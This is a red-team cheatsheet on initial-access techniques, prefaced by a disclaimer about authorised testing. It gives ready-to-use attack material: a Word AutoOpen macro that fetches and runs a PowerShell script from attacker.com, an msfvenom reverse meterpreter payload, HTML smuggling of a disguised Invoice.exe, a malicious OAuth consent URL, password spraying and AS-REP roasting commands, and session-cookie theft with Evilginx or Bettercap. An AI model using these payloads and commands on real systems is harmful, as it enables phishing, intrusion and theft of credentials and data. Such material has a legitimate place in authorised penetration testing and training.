Disclaimer: This cheatsheet is provided for educational and authorized security testing
purposes only. All techniques, tools, and methods described herein must be used only in environments
you have explicit permission to perform security assessments. The author(s) of this
cheatsheet are not responsible for any misuse or damage resulting from the application of this material.
🛬 1. Initial Access
1.1 Phishing
1.1.1 Basic Techniques
1.1.1.1 Malicious Word Macro (Maldoc)
Steps:
- Create a
.docmfile in Word. - Insert a VBA macro with the following code:
Sub AutoOpen()
Dim str As String
str = "powershell -w hidden -nop -c IEX((New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1'))"
Shell str, vbHide
End Sub
- Use MSFVenom to generate the payload:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.20 LPORT=443 -f ps1 > shell.ps1
- Host the file:
python3 -m http.server 80
- Email the victim using GoPhish, King Phisher, or manual
spoofed
email (e.g., using
sendmail,phishery).
1.1.1.2 HTML Smuggling (Modern bypass)
<!-- Save as smuggler.html -->
<script>
const blob = new Blob(["...payload content..."], { type: 'application/octet-stream' });
const link = document.createElement("a");
link.href = URL.createObjectURL(blob);
link.download = "Invoice.exe";
link.click();
</script>
- Minify and obfuscate with tools like HTMLMinifier or Obfuscator.io.
- Host on trusted-looking domain using services like Netlify, GitHub Pages, etc.
- Deliver via spoofed email.
1.1.2 Advanced Techniques
1.1.2.1 Consent Phishing (Microsoft OAuth Abuse)
- Register a malicious app in Azure: Add
User.Read,Mail.Read, orFiles.Read.Allscope. - Craft URL:
https://login.microsoftonline.com/common/oauth3/v2.0/authorize? client_id=<malicious_app_id>&response_type=code& redirect_uri=https://attacker.com/callback& scope=Files.Read.All+offline_access
- Victim authorizes → you receive token → access cloud data (via Microsoft Graph API).
1.1.2.2 Phishing via Compromised Internal Account
- After breaching a low-priv user, dump their mailbox:
Export-Mailbox -Identity "user1@corp.local" -PSTFolderPath C:\outlook.pst
- Reuse reply threads to bypass user suspicion.
- Drop payloads via OneDrive links with enticing file names
(
Q3_Bonus.exe,UrgentInvoice.docm).
1.2 Valid Accounts
1.2.1 Basic Techniques
1.2.1.1 Password Spraying with CrackMapExec
crackmapexec smb 10.10.10.0/24 -u users.txt -p 'Spring2025!' --no-bruteforce
- Use
GetNPUsers.pyfor AS-REP Roasting:
GetNPUsers.py -no-pass CORP.LOCAL/ -usersfile users.txt -dc-ip 10.10.10.2
1.2.1.2 Session Hijacking
- Use
BettercaporEvilginxto extract session cookies:
set http.proxy.sslstrip true set http.proxy.injectjs file.js set http.proxy.script filter-cookies.js
- Load cookie in browser via EditThisCookie extension.